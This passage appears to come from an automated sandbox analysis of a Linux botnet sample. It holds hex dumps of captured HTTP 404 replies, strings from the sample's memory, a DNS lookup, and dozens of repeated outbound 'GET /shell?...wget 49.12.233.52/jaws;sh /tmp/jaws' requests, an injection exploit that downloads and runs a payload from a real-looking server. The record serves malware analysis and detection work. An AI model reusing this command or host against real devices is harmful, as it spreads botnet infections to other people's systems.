3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:24 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:24 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 42X-Varnish: 65793091X-Robots-Tag: noindex, nofollowServer: MIVia: 1.1 miMI-Cache-Age: 0Connection: keep-aliveData Raw: 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e Data Ascii: The requested resource could not be found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 1699Keep-Alive: timeout=5Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-Frame-Options: SAMEORIGINStatus: 404 Not FoundContent-Type: text/html; charset=UTF-8Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheTransfer-Encoding: chunkedCONTENT-LANGUAGE: enDate: Mon, 01 Nov 2021 09:10:24 GMTServer: lighttpd/1.4.39Data Raw: 30 66 30 66 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 69 6e 6b 73 79 73 20 53 6d 61 72 74 20 57 69 2d 46 69 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 21 2d 2d 62 69 67 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 42 45 47 49 4e 5f 43 4f 4d 42 49 4e 45 44 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 72 65 73 65 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 63 6f 6e 6e 65 63 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 61 70 70 6c 65 74 2d 75 69 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 76 61 6c 69 64 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 63 68 65 63 6b 62 6f 78 2d 72 61 64 69 6f 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:26 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:26 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:27 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:59 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>

Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://49.12.233.52/bin
Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 9o6Z1wEokT	String found in binary or memory: http://upx.sf.net

Source: unknown

DNS traffic detected: queries for: scamanje.stresserit.pro

Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
